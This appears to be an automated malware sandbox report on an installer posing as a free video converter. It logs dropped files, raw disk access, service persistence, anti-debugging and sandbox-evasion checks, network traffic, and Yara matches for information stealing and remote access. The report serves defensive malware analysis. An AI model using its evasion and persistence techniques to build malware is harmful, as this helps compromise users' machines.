Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004592D0 push 00459314h; ret 2_2_0045930C
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0040F398 push ecx; mov dword ptr [esp], edx 2_2_0040F39A
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00443440 push ecx; mov dword ptr [esp], ecx 2_2_00443444
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0040546D push eax; ret 2_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0040553D push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004055BE push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00485678 push ecx; mov dword ptr [esp], ecx 2_2_0048567D
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0040563B push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004517F8 push 0045182Bh; ret 2_2_00451823
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004519BC push ecx; mov dword ptr [esp], eax 2_2_004519C1
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00477B08 push ecx; mov dword ptr [esp], edx 2_2_00477B09
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00419C28 push ecx; mov dword ptr [esp], ecx 2_2_00419C2D
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0045FD1C push ecx; mov dword ptr [esp], ecx 2_2_0045FD20
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00499D30 pushad ; retf 2_2_00499D3F
Source: videoconverterfactory.exe.2.dr -- Static PE information: section name: _aett_6 entropy: 7.751550124073949
Source: VideoConverterFactory.exe.3.dr -- Static PE information: section name: _aett_6 entropy: 7.751550124073949

                  Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D2E8A8
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- File created: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\LTDIS13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-9MUD1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3BKG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3OTV.tmp
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- File created: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\is-OIHIC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\ltkrn13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-DEPI7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- File created: C:\ProgramData\VideoConverterFactory\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-T8AR0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\gdiplus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-L1OQV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- File created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-7N8CJ.tmp

                  Boot Survival

Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D2E8A8
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Code function: 3_2_0040D0BB StartServiceCtrlDispatcherA, 3_2_0040D0BB

                  Hooking and other Techniques for Hiding and Protection

Source: unknown -- Network traffic detected: HTTP traffic on port 2024 -> 49992
Source: unknown -- Network traffic detected: HTTP traffic on port 49992 -> 2024
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 2_2_00423C0C
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004241DC IsIconic,SetActiveWindow,SetFocus, 2_2_004241DC
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00424194 IsIconic,SetActiveWindow, 2_2_00424194
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 2_2_00418384
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 2_2_0042285C
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00417598 IsIconic,GetCapture, 2_2_00417598
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 2_2_0048393C
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00417CCE IsIconic,SetWindowPos, 2_2_00417CCE
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 2_2_00417CD0
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 2_2_0041F118
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_02D2E9AC
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Window / User API: threadDelayed 2409
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Window / User API: threadDelayed 7512
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\LTDIS13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-9MUD1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3BKG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3OTV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\is-OIHIC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\ltkrn13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-DEPI7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-T8AR0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\gdiplus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-L1OQV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-7N8CJ.tmp
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5971
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_3-61588
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- API coverage: 5.5 %
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884 -- Thread sleep count: 2409 > 30
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884 -- Thread sleep time: -4818000s >= -30000s
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7352 -- Thread sleep time: -1320000s >= -30000s
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884 -- Thread sleep count: 7512 > 30
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884 -- Thread sleep time: -15024000s >= -30000s
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00452A60 FindFirstFileA,GetLastError, 2_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 2_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 2_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 2_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 2_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp -- Code function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 2_2_00463CDC
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B78
Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe -- Thread delayed: delay time: 60000
Source: videoconverterfactory.exe, 00000003.00000002.2623687277.0000000000708000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAWx
Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003326000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003326000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW_
Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe -- API call chain: ExitProcess graph end node graph_0-6768
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeAPI call chain: ExitProcess graph end nodegraph_3-61975
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep (graph_3-61483)
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_02D33A08 _memset,IsDebuggerPresent,3_2_02D33A08
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_02D3E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02D3E6BE
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502C0
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_02D25E5F RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_02D25E5F
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_02D380E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D380E8
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,2_2_00478504
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,2_2_0042E09C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_02D2E860 cpuid 3_2_02D2E860
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Code function: GetLocaleInfoA,0_2_0040520C
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Code function: GetLocaleInfoA,0_2_00405258
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: GetLocaleInfoA,2_2_00408568
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: GetLocaleInfoA,2_2_004085B4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,2_2_004585C8
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp | Code function: 2_2_0045559C GetUserNameA,2_2_0045559C
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exe | Code function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: videoconverterfactory.exe PID: 7880, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: videoconverterfactory.exe PID: 7880, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_609660FA
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_6090C1D6
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60963143
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_6096A2BD
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,3_2_6096923E
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,3_2_6096A38C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_6096748C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_609254B1
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6094B407
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_6090F435 sqlite3_bind_parameter_index,3_2_6090F435
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe | Code function: 3_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,3_2_609255D4
